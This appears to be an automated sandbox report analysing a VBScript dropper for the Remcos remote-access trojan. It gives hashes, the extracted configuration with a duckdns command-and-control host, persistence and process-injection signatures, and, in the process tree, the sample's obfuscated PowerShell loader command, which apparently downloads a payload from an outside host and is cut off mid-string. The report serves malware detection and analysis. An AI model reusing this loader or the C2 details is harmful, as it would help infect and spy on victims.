Analysis
-
max time kernel
149s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20231127-en -
resource tags
arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system -
submitted
07/12/2023, 12:45
Static task
static1
Behavioral task
behavioral1
Sample
envifa.vbs
Resource
win7-20231023-en
Behavioral task
behavioral2
Sample
envifa.vbs
Resource
win10v2004-20231127-en
General
-
Target
envifa.vbs
-
Size
154KB
-
MD5
18bb62e29138d9c8dd098e5be9a4c13c
-
SHA1
5362535f49fee8fd7333be8fc6ea249deffa2eb9
-
SHA256
e0ad36136960203db1aea53780b49ef2c819ad31d68980822c4dff0d8dab1a14
-
SHA512
0a0e37dab52b3892a9148e40f12408256c8d8eb6dede9217bb47cda010ae672775bd88535b0ab94c6800b3e22ab7c53ae6e9fe8dcd790e9849cfb749fa5b77b8
-
SSDEEP
384:5UDkE9rQyhN65y//88tyLYtymNDycT+zjgyX4uynPivlytR/dJPfyFfhywzqggCq:j2Nek58Rc
Malware Config
Extracted
remcos
RemoteHost
remccoss2023.duckdns.org:4576
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
registros.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-E5ZBB0
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Capturas de pantalla
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 20 3076 powershell.exe 31 3076 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3028534956-1709433221-1313273668-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3076 set thread context of 5080 3076 powershell.exe 98 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2316 powershell.exe 2316 powershell.exe 3076 powershell.exe 3076 powershell.exe 1216 powershell.exe 1216 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2316 powershell.exe Token: SeDebugPrivilege 3076 powershell.exe Token: SeDebugPrivilege 1216 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 5080 RegAsm.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 1380 wrote to memory of 2316 1380 WScript.exe 86 PID 1380 wrote to memory of 2316 1380 WScript.exe 86 PID 2316 wrote to memory of 3076 2316 powershell.exe 88 PID 2316 wrote to memory of 3076 2316 powershell.exe 88 PID 3076 wrote to memory of 1216 3076 powershell.exe 92 PID 3076 wrote to memory of 1216 3076 powershell.exe 92 PID 3076 wrote to memory of 5080 3076 powershell.exe 98 PID 3076 wrote to memory of 5080 3076 powershell.exe 98 PID 3076 wrote to memory of 5080 3076 powershell.exe 98 PID 3076 wrote to memory of 5080 3076 powershell.exe 98 PID 3076 wrote to memory of 5080 3076 powershell.exe 98 PID 3076 wrote to memory of 5080 3076 powershell.exe 98 PID 3076 wrote to memory of 5080 3076 powershell.exe 98 PID 3076 wrote to memory of 5080 3076 powershell.exe 98 PID 3076 wrote to memory of 5080 3076 powershell.exe 98 PID 3076 wrote to memory of 5080 3076 powershell.exe 98 PID 3076 wrote to memory of 5080 3076 powershell.exe 98 PID 3076 wrote to memory of 5080 3076 powershell.exe 98
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\envifa.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1380 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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